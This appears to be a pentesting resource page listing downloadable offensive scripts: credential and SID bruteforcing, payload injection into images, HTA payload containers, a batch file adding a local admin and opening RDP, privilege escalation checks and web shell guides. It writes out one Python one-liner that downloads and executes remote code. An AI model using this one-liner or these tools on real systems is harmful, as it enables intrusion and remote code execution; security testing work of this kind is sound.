top of page

Scripts and Code Snipets

Stand-Alone Exploits


PS used to bruteforce SIDs, user credentials, execute queries, and triggering NTLM auth attempts against a tgt  Download

Image Payload Injection:
 - Injecting PS into a BMP image   Download

 - Injecting payloads into JPG image    Download

Python 1-Line Download/Exec: - python -c 'import urllib2;r=urllib2.urlopen("");exec('

Pre-Built Containers for Payloading

Generic HTA container

Generic container for altering - includes launcher carve out. Download

Shell Code Assistance:
Shell Code Parser and Documenter:

PS / Bash / PY /WSH / VB Scripts

Bash - Entity Enum Script

Various enum collections against tgt domain and IP range. Download

Win Batch - Add User.bat
scripted commands to add a specified user and associated password to local host, move to Admins group, and Start / open RDP (incl FW hole)  Download 

Linux Local Privs Checker / Escalation Tool
Script runs on local Linux hosts and enumerates world writable spaces and checks for common escalation options Download

Bash - Weak SSL Detection Script

Loops through a target listing of domains searching for weak SSL ciphers  Download

Bash - DNS Dump

Brute forces DNS lookup against a domain using the 120+ most common host names (usage: -x {domain.tld} )  Download

Bash -

Scripted nmap scan for Expected Eyewitness ports | results to Eyewitness  Download

MSF Go-To Exploits

Sample xxxx Code

This codes does stuff. Download

Tools and Job Aids

nmap XML --> Reporting

converts nmap.xml files into a format Access can Import and Generate canned Rpts. Download

Creating A Scheduled Task via CLI     Download 

Deploying Web Shells
Resources and example guide for simple web shell deployments

Pentest-Zen (

bottom of page